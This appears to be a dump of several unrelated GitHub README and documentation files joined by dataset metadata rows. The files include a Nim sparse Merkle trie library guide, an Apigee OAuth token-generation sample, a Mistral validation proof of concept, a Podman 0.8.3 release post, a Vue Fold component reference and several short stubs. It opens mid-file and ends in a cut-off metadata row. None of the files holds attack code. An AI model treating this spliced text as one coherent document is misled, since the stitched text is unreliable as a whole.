# ==> [B, C1, D1, C2, D2]
```
## Remember the lie?
Because trie `delete`, `deleteSubtrie` and `set` operation create inaccessible nodes in the underlying DB,
we need to remove them if necessary. We already see that `wholeTrie = getWitness(db, trie.getRootHash(), "")`
will return the whole trie, a list of accessible nodes.
Then we can write the clean tree into a new DB instance to replace the old one.
## Sparse Merkle Trie
Sparse Merkle Trie(SMT) is a variant of Binary Trie which uses binary encoding to
represent path during trie travelsal. When Binary Trie uses three types of node,
SMT only use one type of node without any additional special encoding to store it's key-path.
Actually, it doesn't even store it's key-path anywhere like Binary Trie,
the key-path is stored implicitly in the trie structure during key-value insertion.
Because the key-path is not encoded in any special ways, the bits can be extracted directly from
the key without any conversion.
However, the key restricted to a fixed length because the algorithm demand a fixed height trie
to works properly. In this case, the trie height is limited to 160 level,
or the key is of fixed length 20 bytes (8 bits x 20 = 160).
To be able to use variable length key, the algorithm can be adapted slightly using hashed key before
constructing the binary key-path. For example, if using keccak256 as the hashing function,
then the height of the tree will be 256, but the key itself can be any length.
### The API
The primary API for Binary-trie is `set` and `get`.
* set(key, value, rootHash[optional]) --- _store a value associated with a key_
* get(key, rootHash[optional]): value --- _get a value using a key_
Both `key` and `value` are of `BytesRange` type. And they cannot have zero length.
You can also use convenience API `get` and `set` which accepts
`Bytes` or `string` (a `string` is conceptually wrong in this context
and may costlier than a `BytesRange`, but it is good for testing purpose).
rootHash is an optional parameter. When used, `get` will get a key from specific root,
and `set` will also set a key at specific root.
Getting a non-existent key will return zero length BytesRange or a zeroBytesRange.
Sparse Merkle Trie also provide dictionary syntax API for `set` and `get`.
* trie[key] = value -- same as `set`
* value = trie[key] -- same as `get`
* contains(key) a.k.a. `in` operator
Additional APIs are:
* exists(key) -- returns `bool`, to check key-value existence -- same as contains
* delete(key) -- remove a key-value from the trie
* getRootHash(): `KeccakHash` with `BytesRange` type
* getDB(): `DB` -- get flat-db pointer
* prove(key, rootHash[optional]): proof -- useful for merkling
Constructor API:
* initSparseBinaryTrie(DB, rootHash[optional])
* init(SparseBinaryTrie, DB, rootHash[optional])
Normally you would not set the rootHash when constructing an empty Sparse Merkle Trie.
Setting the rootHash occured in a scenario where you have a populated DB
with existing trie structure and you know the rootHash,
and then you want to continue/resume the trie operations.
## Examples
```Nim
import
eth_trie/[db, sparse_binary, utils]
var
db = newMemoryDB()
trie = initSparseMerkleTrie(db)
let
key1 = "01234567890123456789"
key2 = "abcdefghijklmnopqrst"
trie.set(key1, "value1")
trie.set(key2, "value2")
assert trie.get(key1) == "value1".toRange
assert trie.get(key2) == "value2".toRange
trie.delete(key1)
assert trie.get(key1) == zeroBytesRange
trie.delete(key2)
assert trie[key2] == zeroBytesRange
```
Remember, `set` and `get` are trie operations. A single `set` operation may invoke
more than one store/lookup operation into the underlying DB. The same is also happened to `get` operation,
it could do more than one flat-db lookup before it return the requested value.
While Binary Trie perform a variable numbers of lookup and store operations, Sparse Merkle Trie
will do constant numbers of lookup and store operations each `get` and `set` operation.
## Merkle Proofing
Using ``prove`` dan ``verifyProof`` API, we can do some merkling with SMT.
```Nim
let
value1 = "hello world"
badValue = "bad value"
trie[key1] = value1
var proof = trie.prove(key1)
assert verifyProof(proof, trie.getRootHash(), key1, value1) == true
assert verifyProof(proof, trie.getRootHash(), key1, badValue) == false
assert verifyProof(proof, trie.getRootHash(), key2, value1) == false
```
## License
Licensed and distributed under either of
* MIT license: [LICENSE-MIT](LICENSE-MIT) or http://opensource.org/licenses/MIT
or
* Apache License, Version 2.0, ([LICENSE-APACHEv2](LICENSE-APACHEv2) or http://www.apache.org/licenses/LICENSE-2.0)
at your option. This file may not be copied, modified, or distributed except according to those terms.
| 38.454039 | 204 | 0.703368 | eng_Latn | 0.967718 |
610a5475f93603d68a16c406970a05ef4435c3ac | 4,988 | md | Markdown | sample-proxies/advanced-api-services/token-gen/README.md | sandeep171717/arsenal | bd064abaec6412fd7ab4d12666a3f7d2ecf28821 | [
"Apache-2.0"
] | 413 | 2015-01-09T02:13:27.000Z | 2022-03-27T10:02:46.000Z | sample-proxies/advanced-api-services/token-gen/README.md | sandeep171717/arsenal | bd064abaec6412fd7ab4d12666a3f7d2ecf28821 | [
"Apache-2.0"
] | 52 | 2015-02-04T17:14:38.000Z | 2022-03-21T21:21:49.000Z | sample-proxies/advanced-api-services/token-gen/README.md | sandeep171717/arsenal | bd064abaec6412fd7ab4d12666a3f7d2ecf28821 | [
"Apache-2.0"
] | 625 | 2015-01-06T14:20:15.000Z | 2022-03-21T16:27:15.000Z | # Advanced API Services Token Generation
This sample shows how to integrate Advanced API Services (formerly known as App Services)
security features into the Apigee gateway in order to provide a single unified authentication
and authorization mechanism for applications consuming a combination of back-end services and
data..
This sample exposes a single endpoint, "/v1/datastore/token", which is responsible for all
token-related services. The sample currently supports the following:
-- Access token generation using the OAuth resource owner password grant (grant_type=password)
-- Access token generation using the OAuth client credentials grant (grant_type=client_credentials)
-- Access token invalidation
In this proxy, any user credentials provided as part of a token generation request are validated
against the Advanced API Services "/users" collection. Users can be easily defined in this
collection using the Advanced API Services portal.
In general, when a token is generated, the following occurs:
1) The Authorization header is decoded, and the consumer key and secret are extracted. If no
Authorization header is found, or if the key and secret are not found, a 401 Unauthorized
error is returned.
2) Various information is extracted from the request and stored in Apigee flow variables. A
401 Unauthorized error is returned if the information provided is not consistent with the
request type (no user credentials for a password grant, for example).
3) The consumer key provided is validated, and the custom attributes are extracted from the
application definition. A 401 Unauthorized error is returned if the custom attributes
are not present.
4) An Advanced API Services token generation request is executed, which validates any user
credentials provided in the request and returns a new Advanced API Services access token.
A 401 Unauthorized error is returned if the request fails.
5) The Advanced API Services token is extracted, and a new Apigee Gateway token is generated.
The Advanced API Services token is stored as an attribute of the new Gateway token.
6) A final response is generated containing the new Gateway access token, the token time-to-live,
and the refresh token (if present).
# Set up
* Import the proxy into your Apigee system by importing the bundle using the supplied "deploy.sh"
script.
# Configure
1. Using the Apigee Enterprise UI, create a new API Product and configure it to allow access to
all resources in the imported bundle by using the "/" and "/**" resource paths and the name of
the imported bundle.
2. Using the Apigee Enterprise UI, create a new developer.
3. Using the Apigee Enterprise UI, create a new developer application and associate it with the
developer created in step 2. Configure the application to use the API Product you created in
step 1. Once this application is saved you can view the consumer key (client ID) and shared
secret that were generated for this application. IMPORTANT: This consumer key and secret is
what should be used when tokens are generated, not the Advanced API Services key and secret.
4. Configure the application you created in step 3 with the following custom attributes (NOTE:
the case of the attribute names is important):
Attribute name Meaning
---------------------------- -----------------------------------------------
DATA_STORE_APP_CONSUMER_KEY The consumer key associated with the Advanced API Services
app you want to use.
DATA_STORE_APP_CONSUMER_SECRET The shared secret associated with the Advanced API Services
app you want to use.
DATA_STORE_APP_NAME The name of the Advanced API Services application you want
to use
DATA_STORE_ORG_NAME The name of the Advanced API Services organization you want
to use.
All of this information can be obtained by referring to the "Getting Started" tab for your
selected organization and application in the Advanced API Services portal.
# Using the sample
The "invoke.sh" script provided with this sample includes commands to generate both password grant
and client credentials grant tokens, and also commands to invalidate tokens.
For a sample of how to validate and use tokens generated using this proxy, see the "token-validate"
sample.
# Get help
For assistance, please use [Apigee Support](https://community.apigee.com/content/apigee-customer-support).
Copyright © 2014, 2015 Apigee Corporation
Licensed under the Apache License, Version 2.0 (the "License"); you may not use
this file except in compliance with the License. You may obtain a copy
of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
| 47.504762 | 106 | 0.778468 | eng_Latn | 0.998252 |
610a592098249dbf686164b0498979106eec8327 | 115 | md | Markdown | README.md | flash-global/cache-client | 8985abd1b878a46b9a9b4bb5a13a9c825c7bf392 | [
"MIT"
] | null | null | null | README.md | flash-global/cache-client | 8985abd1b878a46b9a9b4bb5a13a9c825c7bf392 | [
"MIT"
] | 1 | 2017-10-18T10:10:21.000Z | 2017-10-18T10:10:21.000Z | README.md | flash-global/cache-client | 8985abd1b878a46b9a9b4bb5a13a9c825c7bf392 | [
"MIT"
] | null | null | null | Cache client
===
The cache client will be used to access cache containers like Memcached, Redis, Filesystem etc.. | 28.75 | 97 | 0.773913 | eng_Latn | 0.967054 |
610b8b46ebc22187df31258911d70fde8c9f6235 | 983 | md | Markdown | content/project/agent-bingo-robot/index.md | glennji/glennjicom-academic | ad58b1333ae4cb2febf0104c18e3fb4e6997bedf | [
"MIT"
] | null | null | null | content/project/agent-bingo-robot/index.md | glennji/glennjicom-academic | ad58b1333ae4cb2febf0104c18e3fb4e6997bedf | [
"MIT"
] | null | null | null | content/project/agent-bingo-robot/index.md | glennji/glennjicom-academic | ad58b1333ae4cb2febf0104c18e3fb4e6997bedf | [
"MIT"
] | null | null | null | ---
title: "Agent Bingo Robot"
subtitle: "Cheap robot goes boom"
summary: ""
authors: [glennji]
crosslink: "true"
tags: ["inprogress", "hobby", "hardware"]
categories: [Robotics]
date: 2019-11-14T00:38:45+11:00
lastmod: 2019-11-14T00:38:45+11:00
featured: false
draft: false
---
A couple of years ago, Jules got given a cheap toy robot, and it wasn't long before it broke. He wasn't too fussed[^1] and eventually let me tear it to pieces. My big plan was to use the bot as a platform for experimentation, but of course you can see from the dates on the 'blog entries that it just didn't happen.
[^1]: Well, I don't remember him being too fussed anyway. Which probably means his tears and grief at losing this _precious toy_ (that he never played with) were brief.
## Plans
* find all the pieces
* test the DC motor drivers and an Arduino brain to return Bingo to "feature parity"
* Add ultrasonic distance sensors
* Add an LED display to his face or body
* ...
* robot uprising
| 35.107143 | 315 | 0.738555 | eng_Latn | 0.997742 |
610cf5f0816b5fec07641d630742a7f3a3cb4893 | 489 | md | Markdown | cmd/docs/mailbox_campaign_hash.md | lenatech/mailbox | 296601865f856d14baa5dd95a006d40841e09ac2 | [
"MIT"
] | 26 | 2017-06-29T13:22:52.000Z | 2022-01-22T15:36:05.000Z | cmd/docs/mailbox_campaign_hash.md | lenatech/mailbox | 296601865f856d14baa5dd95a006d40841e09ac2 | [
"MIT"
] | 7 | 2017-07-26T13:48:48.000Z | 2019-04-10T06:55:09.000Z | cmd/docs/mailbox_campaign_hash.md | toomore/mailbox | fee733cb16be21bae446b3b23f30068b76b33511 | [
"MIT"
] | 6 | 2017-07-08T05:53:19.000Z | 2020-10-15T09:56:58.000Z | ## mailbox campaign hash
Hash cid, uid
### Synopsis
產生一組開信追蹤連結,需要 cid, uid
```
mailbox campaign hash [flags]
```
### Options
```
--cid string campaign ID
-h, --help help for hash
--uid string user ID
```
### Options inherited from parent commands
```
--config string config file (default is $HOME/.mailbox.yaml)
```
### SEE ALSO
* [mailbox campaign](mailbox_campaign.md) - Campaign operator
###### Auto generated by spf13/cobra on 29-Jun-2017
| 15.28125 | 68 | 0.629857 | eng_Latn | 0.744312 |
610e6f6fce839edc60f6287b0e3c9be2b1326b27 | 2,191 | md | Markdown | ansible-tests/mistral/README.md | rthallisey/clapper | 7f6aeae9320c2c8b46c8f56d2a6191ecc6991e5b | [
"Apache-2.0"
] | 13 | 2015-10-19T02:02:23.000Z | 2019-01-03T09:07:08.000Z | ansible-tests/mistral/README.md | rthallisey/clapper | 7f6aeae9320c2c8b46c8f56d2a6191ecc6991e5b | [
"Apache-2.0"
] | 42 | 2015-09-04T18:02:17.000Z | 2016-12-20T14:47:09.000Z | ansible-tests/mistral/README.md | rthallisey/clapper | 7f6aeae9320c2c8b46c8f56d2a6191ecc6991e5b | [
"Apache-2.0"
] | 22 | 2015-07-27T16:37:59.000Z | 2019-04-09T02:04:10.000Z | # Mistral PoC
This is really rough. Basically, we add a Mistral action that runs a
shell script which runs ansible with a single validation.
## Prerequisites
You will need an undercloud with the mistral services running.
Assuming you have a recent enough instack-undercloud (Mitaka), the easiest is
to set `enable_mistral=true` in your 'undercloud.conf' file prior to running
`openstack undercloud install`. That's it.
On the undercloud, verify you have mistral_engine, mistral_api and
mistral_executor running with:
$ pgrep -a mistral
You also need to have ansible installed on the undercloud:
$ sudo pip install 'ansible>=2'
Finaly, make sure `sudo` can run without the need for a tty. In `/etc/sudoers`
comment out the line "Defaults requiretty" if it's set.
## Mistral validation setup:
Install the `tripleo-validations` python module using the deploy.sh script:
$ cd clapper/ansible-tests/mistral
$ sudo ./deploy.sh
Load the `tripleo.validations` workbook:
$ mistral workbook-create validations_workbook.yaml
## Running mistral actions directly
Run the `tripleo.run_validation` or `tripleo.list_validations` actions with
mistral client:
mistral run-action -s tripleo.run_validation 512e
It will be run asynchronously and store the result in the mistral DB. Run
`mistral action-execution-list` to see the status of all Mistral runs and
`mistral action-execution-get-output <uuid>` to get a particular run's output.
The output is whatever dict we return from our Python code converted to json.
## Running validations using the mistral workflow
Create a context.json file containing the arguments passed to the workflow:
{
"validation_names": ["512e", "rabbitmq-limits"]
}
Run the `tripleo.validations.run` workflow with mistral client:
mistral execution-create tripleo.validations.run context.json
## Running groups of validations
Create a context.json file containing the arguments passed to the workflow:
{
"group_names": ["network", "post-deployment"]
}
Run the `tripleo.validations.run_group` workflow with mistral client:
mistral execution-create tripleo.validations.run_group context.json
| 28.454545 | 78 | 0.764035 | eng_Latn | 0.980617 |
610ed2008f2a6d087ebac97e1e1aa0d0d61686b5 | 183 | md | Markdown | README.md | amzoss/2021-08-24-suffolk-online | e273c13fea517a71823587113d4c0a4b75f422ce | [
"CC-BY-4.0"
] | null | null | null | README.md | amzoss/2021-08-24-suffolk-online | e273c13fea517a71823587113d4c0a4b75f422ce | [
"CC-BY-4.0"
] | null | null | null | README.md | amzoss/2021-08-24-suffolk-online | e273c13fea517a71823587113d4c0a4b75f422ce | [
"CC-BY-4.0"
] | null | null | null | # Library Carpentries workshop for Suffolk Cooperative Library System, Aug-Sep 2021
This code drives the [main workshop site](https://www.angelazoss.com/2021-08-24-suffolk-online/).
| 45.75 | 97 | 0.79235 | yue_Hant | 0.333207 |
610f3a847ee2c75eb30855dcd1c85d2077e02b86 | 136 | md | Markdown | buildSrc/Readme.md | Coronel-B/Mobius-Android | 5d696f0cb82d60da001f18dd61491cc50001de96 | [
"Apache-2.0"
] | 2 | 2021-03-21T04:50:09.000Z | 2021-03-23T23:21:44.000Z | buildSrc/Readme.md | Coronel-B/Mobius-KMM | 5d696f0cb82d60da001f18dd61491cc50001de96 | [
"Apache-2.0"
] | null | null | null | buildSrc/Readme.md | Coronel-B/Mobius-KMM | 5d696f0cb82d60da001f18dd61491cc50001de96 | [
"Apache-2.0"
] | null | null | null | (Use buildSrc to abstract imperative logic)[https://docs.gradle.org/current/userguide/organizing_gradle_projects.html#sec:build_sources] | 136 | 136 | 0.852941 | kor_Hang | 0.281196 |
610f526a834d21793d54fef547a56d82f6dccbee | 11,814 | md | Markdown | WindowsServerDocs/manage/windows-admin-center/azure/azure-monitor.md | baleng/windowsserverdocs.it-it | 8896bd5cff0154bf6b57c7de33efd7e65710947a | [
"CC-BY-4.0",
"MIT"
] | null | null | null | WindowsServerDocs/manage/windows-admin-center/azure/azure-monitor.md | baleng/windowsserverdocs.it-it | 8896bd5cff0154bf6b57c7de33efd7e65710947a | [
"CC-BY-4.0",
"MIT"
] | null | null | null | WindowsServerDocs/manage/windows-admin-center/azure/azure-monitor.md | baleng/windowsserverdocs.it-it | 8896bd5cff0154bf6b57c7de33efd7e65710947a | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Monitorare i server e configurare gli avvisi con monitoraggio di Azure dall'interfaccia di amministrazione di Windows
description: L'interfaccia di amministrazione di Windows (Project Honolulu) si integra con monitoraggio di Azure
ms.technology: manage
ms.topic: article
author: haley-rowland
ms.author: harowl
ms.localizationpriority: medium
ms.prod: windows-server
ms.date: 03/24/2019
ms.openlocfilehash: 28108a79bbdc654f6437a698c158a3f74d4423ba
ms.sourcegitcommit: 6aff3d88ff22ea141a6ea6572a5ad8dd6321f199
ms.translationtype: MT
ms.contentlocale: it-IT
ms.lasthandoff: 09/27/2019
ms.locfileid: "71407014"
---
# <a name="monitor-servers-and-configure-alerts-with-azure-monitor-from-windows-admin-center"></a>Monitorare i server e configurare gli avvisi con monitoraggio di Azure dall'interfaccia di amministrazione di Windows
[Altre informazioni sull'integrazione di Azure con l'interfaccia di amministrazione di Windows.](../plan/azure-integration-options.md)
[Monitoraggio di Azure](https://docs.microsoft.com/azure/azure-monitor/overview) è una soluzione che raccoglie, analizza e agisce sui dati di telemetria da un'ampia gamma di risorse, tra cui server e macchine virtuali Windows, sia in locale che nel cloud. Anche se monitoraggio di Azure estrae i dati dalle macchine virtuali di Azure e da altre risorse di Azure, questo articolo è incentrato sul funzionamento di monitoraggio di Azure con server e macchine virtuali locali, in particolare con l'interfaccia di amministrazione di Windows. Per informazioni su come usare monitoraggio di Azure per ricevere avvisi di posta elettronica sul cluster iperconvergente, vedere l'articolo relativo [all'uso di monitoraggio di Azure per inviare messaggi di posta elettronica per gli errori di servizio integrità](https://docs.microsoft.com/windows-server/storage/storage-spaces/configure-azure-monitor).
## <a name="how-does-azure-monitor-work"></a>Funzionamento di monitoraggio di Azure
 (nello strumento aggiornamenti)
- Monitoraggio di Azure per le macchine virtuali (in Impostazioni Server), a. k. informazioni dettagliate sulle macchine virtuali
È possibile iniziare a usare monitoraggio di Azure da uno di questi strumenti. Se il monitoraggio di Azure non è mai stato usato in precedenza, WAC effettuerà automaticamente il provisioning di un'area di lavoro Log Analytics (e dell'account di automazione di Azure, se necessario) e installerà e configurerà il Microsoft Monitoring Agent (MMA) nel server di destinazione La soluzione corrispondente verrà quindi installata nell'area di lavoro.
Ad esempio, se si passa prima allo strumento aggiornamenti per configurare Azure Gestione aggiornamenti, WAC sarà:
1. Installare MMA nel computer
2. Creare l'area di lavoro Log Analytics e l'account di automazione di Azure (perché in questo caso è necessario un account di automazione di Azure)
3. Installare la soluzione Gestione aggiornamenti nell'area di lavoro appena creata.
Se si vuole aggiungere un'altra soluzione di monitoraggio da WAC nello stesso server, WAC installa semplicemente tale soluzione nell'area di lavoro esistente a cui è connesso il server. WAC installerà inoltre eventuali altri agenti necessari.
Se ci si connette a un server diverso, ma è già stata configurata un'area di lavoro Log Analytics (tramite WAC o manualmente nel portale di Azure), è anche possibile installare l'agente MMA nel server e connetterlo a un'area di lavoro esistente. Quando si connette un server in un'area di lavoro, viene automaticamente avviata la raccolta dei dati e la creazione di report per le soluzioni installate nell'area di lavoro.
## <a name="azure-monitor-for-virtual-machines-aka-virtual-machine-insights"></a>Monitoraggio di Azure per le macchine virtuali (noto anche come Informazioni dettagliate sulla macchina virtuale
>Si applica a: Anteprima di Windows Admin Center
Quando si configura Monitoraggio di Azure per le macchine virtuali in Impostazioni server, l'interfaccia di amministrazione di Windows Abilita la soluzione Monitoraggio di Azure per le macchine virtuali, nota anche come Virtual Machine Insights. Questa soluzione consente di monitorare l'integrità del server e gli eventi, creare avvisi di posta elettronica, ottenere una visualizzazione consolidata delle prestazioni del server nell'ambiente e visualizzare le app, i sistemi e i servizi connessi a un determinato server.
> [!NOTE]
> Nonostante il nome, VM Insights funziona anche per i server fisici e le macchine virtuali.
Con i 5 GB di dati/mese/indennità clienti di monitoraggio di Azure, è possibile provare facilmente a eseguire questa operazione per un server o due senza doversi preoccupare di ricevere addebiti. Continua a leggere per visualizzare i vantaggi aggiuntivi dei server di onboarding in monitoraggio di Azure, ad esempio ottenere una visualizzazione consolidata delle prestazioni dei sistemi tra i server nell'ambiente.
### <a name="set-up-your-server-for-use-with-azure-monitor"></a>**Configurare il server per l'uso con monitoraggio di Azure**
Dalla pagina Panoramica di una connessione al server, fare clic sul pulsante nuovo "Gestisci avvisi" oppure passare a impostazioni server > monitoraggio e avvisi. In questa pagina, caricare il server in monitoraggio di Azure facendo clic su "Configura" e completando il riquadro di installazione. L'interfaccia di amministrazione esegue il provisioning dell'area di lavoro di Azure Log Analytics, installando l'agente necessario e verificando che la soluzione VM Insights sia configurata. Al termine, il server invierà i dati dei contatori delle prestazioni a monitoraggio di Azure, consentendo di visualizzare e creare avvisi di posta elettronica basati su questo server, dal portale di Azure.
### <a name="create-email-alerts"></a>**Creare avvisi di posta elettronica**
Dopo aver collegato il server a monitoraggio di Azure, è possibile usare i collegamenti ipertestuali intelligenti all'interno della pagina Impostazioni > monitoraggio e avvisi per passare al portale di Azure. L'interfaccia di amministrazione consente di raccogliere automaticamente i contatori delle prestazioni, in modo da poter [creare facilmente un nuovo avviso](https://docs.microsoft.com/azure/azure-monitor/platform/alerts-log) personalizzando una delle numerose query predefinite o scrivendone di personalizzate.
### <a name="get-a-consolidated-view-across-multiple-servers-"></a>\* * Ottenere una visualizzazione consolidata tra più server * *
Se si caricano più server in una singola area di lavoro Log Analytics all'interno di monitoraggio di Azure, è possibile ottenere una visualizzazione consolidata di tutti questi server dalla [soluzione macchine virtuali Insights](https://docs.microsoft.com/azure/azure-monitor/insights/vminsights-overview) in monitoraggio di Azure. Si noti che solo le schede prestazioni e mappe di macchine virtuali informazioni dettagliate per monitoraggio di Azure funzioneranno con i server locali: la scheda integrità funziona solo con le macchine virtuali di Azure. Per visualizzarlo nella portale di Azure, passare a monitoraggio di Azure > macchine virtuali (in Insights) e passare alle schede "prestazioni" o "mappe".
### <a name="visualize-apps-systems-and-services-connected-to-a-given-server"></a>**Visualizza le app, i sistemi e i servizi connessi a un determinato server**
Quando l'interfaccia di amministrazione carica un server nella soluzione VM Insights all'interno di monitoraggio di Azure, viene anche accesa una funzionalità denominata [mapping dei servizi](https://docs.microsoft.com/azure/azure-monitor/insights/service-map). Questa funzionalità consente di individuare automaticamente i componenti dell'applicazione e di mappare le comunicazioni tra i servizi in modo che sia possibile visualizzare facilmente le connessioni tra i server con informazioni dettagliate dal portale di Azure. Per trovarlo, passare alla portale di Azure > monitoraggio di Azure > macchine virtuali (in Insights) e passare alla scheda "Maps".
> [!NOTE]
> Le visualizzazioni per le informazioni dettagliate sulle macchine virtuali per monitoraggio di Azure sono attualmente disponibili in 6 aree pubbliche. Per informazioni aggiornate, vedere la [documentazione monitoraggio di Azure per le macchine virtuali](https://docs.microsoft.com/azure/azure-monitor/insights/vminsights-onboard#log-analytics). Per ottenere i vantaggi aggiuntivi offerti dalla soluzione Virtual Machine Insights descritta in precedenza, è necessario distribuire l'area di lavoro Log Analytics in una delle aree supportate.
## <a name="disabling-monitoring"></a>Disabilitazione del monitoraggio
Per disconnettere completamente il server dall'area di lavoro Log Analytics, disinstallare l'agente MMA. Questo significa che il server non invierà più dati all'area di lavoro e tutte le soluzioni installate in tale area di lavoro non raccoglieranno ed elaborano i dati da tale server. Tuttavia, ciò non influisce sull'area di lavoro stessa. tutte le risorse che inviano report all'area di lavoro continueranno a farlo. Per disinstallare l'agente MMA in WAC, passare a app & funzionalità, trovare il Microsoft Monitoring Agent e fare clic su Disinstalla.
Se si desidera disattivare una soluzione specifica in un'area di lavoro, sarà necessario [rimuovere la soluzione di monitoraggio dalla portale di Azure](https://docs.microsoft.com/azure/azure-monitor/insights/solutions#remove-a-management-solution). La rimozione di una soluzione di monitoraggio indica che le informazioni create da tale soluzione non verranno più generate _per i_ server che inviano report all'area di lavoro. Se, ad esempio, si disinstalla la soluzione Monitoraggio di Azure per le macchine virtuali, non vengono più visualizzate informazioni dettagliate sulle prestazioni delle macchine virtuali o dei server da qualsiasi computer connesso all'area di lavoro. | 137.372093 | 892 | 0.819621 | ita_Latn | 0.999616 |
61105d2f18bffc7f40cbf40fdeb759dccb5d2a83 | 278 | md | Markdown | README.md | aaxxios/utilities | d7ee24c68b51960c7104f5cad08f2c2bc7e756b8 | [
"MIT"
] | null | null | null | README.md | aaxxios/utilities | d7ee24c68b51960c7104f5cad08f2c2bc7e756b8 | [
"MIT"
] | null | null | null | README.md | aaxxios/utilities | d7ee24c68b51960c7104f5cad08f2c2bc7e756b8 | [
"MIT"
] | null | null | null | # utilities
===========
Compute the hash of any file.
Supported algorithms vary depending on your machine
#Usage
git clone https://github.com/aaxxios/utilities.git
cd utilities/routines
python setup.py build && python setup.py install
===Hashing with md5===
hasher md5 <file>
| 21.384615 | 51 | 0.744604 | eng_Latn | 0.832506 |
61124f23b081fa1aaafc26ef3bc1518a427d4926 | 641 | md | Markdown | README.md | smirnovpaul/flussonic-api-py | 22d7545a11df945edf87257471b8604a0e06b082 | [
"MIT"
] | null | null | null | README.md | smirnovpaul/flussonic-api-py | 22d7545a11df945edf87257471b8604a0e06b082 | [
"MIT"
] | null | null | null | README.md | smirnovpaul/flussonic-api-py | 22d7545a11df945edf87257471b8604a0e06b082 | [
"MIT"
] | null | null | null | # Flussonic-api-py
Flussonic client API for connection server.
Unofficial, created on the basis of the documentation.
Active link of [official project](http://erlyvideo.ru/doc)
### Frameworks/language:
* **Python 2.7.x/3.x**
* **Django > 1.6**
* **Flask > 0.8**
### API:
* Database (Simple emulation like a MySQL);
* DVR;
* HTTP (Methods of documentation).
### Documentation with Mkdocs (TODOS):
* API;
* Connection;
* More details.
### Install:
```sh
git clone https://github.com/smirnovpaul/flussonic-api-py.git
cd flussonic-api-py
pip install -r requirements.txt
```
**Don't forget** to switch on logging
### License:
----
MIT | 16.868421 | 61 | 0.686427 | eng_Latn | 0.422809 |
6113129db0364a5a9f7bdb845f022046c122c452 | 1,499 | md | Markdown | docs/Fold/README.md | battleaxedotco/brutalism-docs | 75b75bcb113808fb69db282d3107b59b26cc84ec | [
"MIT"
] | null | null | null | docs/Fold/README.md | battleaxedotco/brutalism-docs | 75b75bcb113808fb69db282d3107b59b26cc84ec | [
"MIT"
] | 6 | 2020-06-14T06:28:02.000Z | 2022-02-27T03:43:18.000Z | docs/Fold/README.md | battleaxedotco/brutalism-docs | 75b75bcb113808fb69db282d3107b59b26cc84ec | [
"MIT"
] | null | null | null | # Fold
## Styles
```html
<Fold label="Default">
<Fold label="Nested Default">
<Button label="Slot content" />
</Fold>
</Fold>
```
| Property | Type | Default | Description |
|:---|:---|:---| ---:|
| | | | |
## Props
```html
<Fold label='mount as open' :open="true">
<Button label="Slot content" />
</Fold>
<Fold prefs-id="exampleID" label="auto-save state">
<Button label="Slot content" />
</Fold>
<Fold label='persistent' :persistent="false">
<Button label="Slot content" />
</Fold>
<Fold label='inner-padding' inner-padding="30px">
<Button label="Slot content" />
</Fold>
```
| Property | Type | Default | Description |
|:---|:---|:---| ---:|
| label | String | | Text to appear before folding icon |
| open | Boolean | false | Reactive prop to open and shut component |
| prefs-id | String | | Autosave value in localStorage |
| persistent | Boolean | true | If false, contents are destroyed when shut |
| inner-padding | String | | Padding assigned between parent and slot |
## Events
```html
<Fold label='@click' :open="true" @click="testClick">
<Button label="Slot content" />
</Fold>
<Fold label='@prefs' :open="true" prefs-id="foldExampleEvent" @prefs="testPrefs">
<Button label="Slot content" />
</Fold>
```
| Event | Arguments | Description |
|:---|:---| ---:|
| @click | callback() | Method to execute on native click event |
| @prefs | callback( item ) | Returns on component mount with prefs value |
| 25.844828 | 83 | 0.609073 | eng_Latn | 0.741987 |
6113284f5a07f701ba069e41ebac81fc4b92e4f0 | 1,663 | md | Markdown | _posts/2018-08-20-podman-alpha-v0.8.3.md | edhaynes/podman.io | 8557214cb9041ccdc6863dbe81073f5803c0b75c | [
"MIT"
] | 2 | 2020-12-03T08:16:10.000Z | 2021-12-28T05:59:40.000Z | _posts/2018-08-20-podman-alpha-v0.8.3.md | edhaynes/podman.io | 8557214cb9041ccdc6863dbe81073f5803c0b75c | [
"MIT"
] | 1 | 2021-02-23T16:32:28.000Z | 2021-02-23T16:32:28.000Z | _posts/2018-08-20-podman-alpha-v0.8.3.md | edhaynes/podman.io | 8557214cb9041ccdc6863dbe81073f5803c0b75c | [
"MIT"
] | 2 | 2021-04-01T13:47:20.000Z | 2021-09-29T15:23:48.000Z | ---
title: Podman Alpha version 0.8.3 Release Announcement
layout: default
author: bbaude
categories: [releases]
tags: community, open source, podman
---
<img src="https://podman.io/images/podman.svg" alt="podman logo">
# Podman release 0.8.3
Our release this week was very smooth. It seems like between CI infrastructure stability, last minute pull requests, and sometimes just plain bad luck, something always gives us trouble on Friday’s. The Fedora packages are created and I see that they are getting their karma and working through the process already.
By the way, we moved! Our new upstream location is [https://github.com/containers/podman](https://github.com/containers/podman). It seems to be a more natural fit for our project and more closely associates us with some of our sister projects.
<!--readmore-->
Some of the more obvious changes in this release are:
* Updated documentation to mention that systemd is now the default cgroup manager.
* The create|run switch of — uts-host now works correctly.
* Add pod stats as a sub-command. Similar to podman stats, it allows you to see statistics about running pods and their containers.
* Varlink API endpoints for many of the pod subcommands were added.
* Support format for the varlink API endpoint Commit (OCI or docker)
* Fix handling of the container’s hostname when using — host=net
* When searching multiple registries, do not make an error from one registry be fatal.
* Create and Pull commands were added to the python client.
Our IRC channel has not moved. Much of the development team can be found on Freenode in #podman. Come by and introduce yourself!
| 57.344828 | 315 | 0.764883 | eng_Latn | 0.998578 |
61134a309f345bbfc7dcf6cccbf4a7d92b573a48 | 56 | md | Markdown | README.md | ikosan91/flutter_demos | d9ba5de60a71d6968493a0aa3e8d745d6f7744e6 | [
"MIT"
] | null | null | null | README.md | ikosan91/flutter_demos | d9ba5de60a71d6968493a0aa3e8d745d6f7744e6 | [
"MIT"
] | null | null | null | README.md | ikosan91/flutter_demos | d9ba5de60a71d6968493a0aa3e8d745d6f7744e6 | [
"MIT"
] | null | null | null | # flutter_demos
Flutter demonstrations for web articles
| 18.666667 | 39 | 0.857143 | eng_Latn | 0.812497 |
61137fed62f7ffa1fdf94bb6c6038238b5922991 | 412 | md | Markdown | src/main/resources/beetlsql/mysql/newslist.md | LiuAustin/ptg | 28b145074c70b6b3d2d7b3f1106c6b47f3c855e5 | [
"Apache-2.0"
